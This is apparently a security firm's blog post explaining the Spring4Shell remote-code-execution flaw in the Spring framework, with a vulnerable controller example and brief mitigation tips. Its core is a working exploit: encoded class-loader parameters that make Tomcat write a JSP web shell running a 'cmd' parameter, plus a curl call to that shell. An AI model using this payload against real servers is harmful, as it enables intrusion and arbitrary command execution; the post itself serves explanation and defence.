Blog

Spring4Shell as a class injection example

Two serious vulnerabilities leading to remote code execution (RCE) have been found in the popular Spring framework, one in Spring Core and the other in Spring Cloud Functions.

schedule a call

Credit: LunaSec https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/

$ curl 'https://tenendo.com:8080/spring4shell?class.module.classLoader.resources.context.parent.pipeline.first.pattern=test'
$ # wait, what?

ModelAttribute example:

public class Greeting {  
	private long id;  
  
	public long getId() {  
		return id;  
	}  
  
	public void setId(long id) {  
		this.id = id;  
	}  
}  
  
@Controller  
public class HelloController {  
	@PostMapping("/greeting")  
	public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) {  
		return "hello";  
	}  
}

Class injection exploitation example:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di  
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp  
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT  
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell  
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

a series of requests result in the creation of shell.jsp log with the following logging pattern:

%{prefix}i java.io.InputStream in = %{c}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %{suffix}i
curl https://tenendo.com:8080/shell.jsp?cmd=whoami

Mitigation:

  • do not use deserialization
  • do not ever allow passing serialized data as arguments
  • research how your parsers treat object creation, metadata and language extensions
  • validate user input

Insecure deserialization

Insecure deserialization is when user-controllable data is deserialised by a website. This potentially enables an attacker to manipulate serialised objects… Read more